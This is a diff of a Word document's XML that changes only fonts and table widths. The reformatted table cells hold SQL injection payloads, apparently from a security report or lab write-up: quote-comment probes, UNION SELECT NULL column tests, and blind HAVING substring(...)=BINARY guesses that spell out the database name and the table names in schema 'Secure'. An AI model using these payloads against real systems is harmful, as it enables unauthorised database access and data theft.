+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                 <w:b/>
                 <w:bCs/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
@@ -8377,7 +9077,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="895" w:type="dxa"/>
+            <w:tcW w:w="704" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -8397,7 +9097,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3920" w:type="dxa"/>
+            <w:tcW w:w="4111" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -8408,20 +9108,26 @@
               </w:numPr>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>'</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> --+</w:t>
@@ -8436,13 +9142,17 @@
               </w:numPr>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -8450,7 +9160,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -8458,7 +9170,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>,NULL --+</w:t>
@@ -8530,7 +9244,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="895" w:type="dxa"/>
+            <w:tcW w:w="704" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -8550,7 +9264,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3920" w:type="dxa"/>
+            <w:tcW w:w="4111" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -8561,13 +9275,17 @@
               </w:numPr>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -8575,7 +9293,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -8583,21 +9303,27 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>,NULL having</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substring(database(),1,1)=BINARY 'S' limit 1 --+</w:t>
@@ -8612,13 +9338,17 @@
               </w:numPr>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -8626,7 +9356,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -8634,7 +9366,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>,NULL having substring(database(),1,2)=BINARY 'Se' limit 1 --+</w:t>
@@ -8976,7 +9710,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="895" w:type="dxa"/>
+            <w:tcW w:w="704" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -8997,7 +9731,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3920" w:type="dxa"/>
+            <w:tcW w:w="4111" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -9009,13 +9743,17 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -9023,7 +9761,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -9031,7 +9771,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">, </w:t>
@@ -9039,7 +9781,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_name</w:t>
@@ -9047,7 +9791,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> from </w:t>
@@ -9055,7 +9801,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>information_schema.columns</w:t>
@@ -9063,7 +9811,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> where </w:t>
@@ -9071,7 +9821,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_schema</w:t>
@@ -9079,7 +9831,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">='Secure' having </w:t>
@@ -9087,7 +9841,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substr</w:t>
@@ -9095,7 +9851,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>(table_name,1,7)=BINARY 'testing' limit 1 --+</w:t>
@@ -9111,13 +9869,17 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -9125,7 +9887,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -9133,7 +9897,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">, </w:t>
@@ -9141,7 +9907,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_name</w:t>
@@ -9149,7 +9917,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> from </w:t>
@@ -9157,7 +9927,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>information_schema.columns</w:t>
@@ -9165,7 +9937,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> where </w:t>
@@ -9173,7 +9947,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_schema</w:t>
@@ -9181,7 +9957,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">='Secure' having </w:t>
@@ -9189,7 +9967,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substr</w:t>
@@ -9197,7 +9977,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">(table_name,1,9)=BINARY 'Trainings' and </w:t>
@@ -9205,7 +9987,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_name</w:t>
@@ -9213,7 +9997,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>&lt;&gt;'testing' limit 1 --+</w:t>
@@ -9229,13 +10015,17 @@
               <w:spacing w:line="276" w:lineRule="auto"/>
               <w:ind w:firstLineChars="0"/>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">' union select </w:t>
@@ -9243,7 +10033,9 @@
             <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>NULL,NULL</w:t>
@@ -9251,7 +10043,9 @@
             <w:proofErr w:type="gramEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">, </w:t>
@@ -9259,7 +10053,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_name</w:t>
@@ -9267,7 +10063,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> from </w:t>
@@ -9275,7 +10073,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>information_schema.columns</w:t>
@@ -9283,7 +10083,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve"> where </w:t>
@@ -9291,7 +10093,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_schema</w:t>
@@ -9299,7 +10103,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">='Secure' having </w:t>
@@ -9307,7 +10113,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>substr</w:t>
@@ -9315,7 +10123,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">(table_name,1,5)=BINARY 'Users' and </w:t>
@@ -9323,7 +10133,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_name</w:t>
@@ -9331,7 +10143,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t xml:space="preserve">&lt;&gt;'testing' and </w:t>
@@ -9339,7 +10153,9 @@
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>table_name</w:t>
@@ -9347,7 +10163,9 @@
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:t>&lt;&gt;'Trainings' limit 1 --+</w:t>
@@ -9475,7 +10293,7 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="895" w:type="dxa"/>
+            <w:tcW w:w="704" w:type="dxa"/>
           </w:tcPr>
           <w:p>
             <w:pPr>
@@ -9495,7 +10313,7 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="3920" w:type="dxa"/>
+            <w:tcW w:w="4111" w:type="dxa"/>
           </w:tcPr>
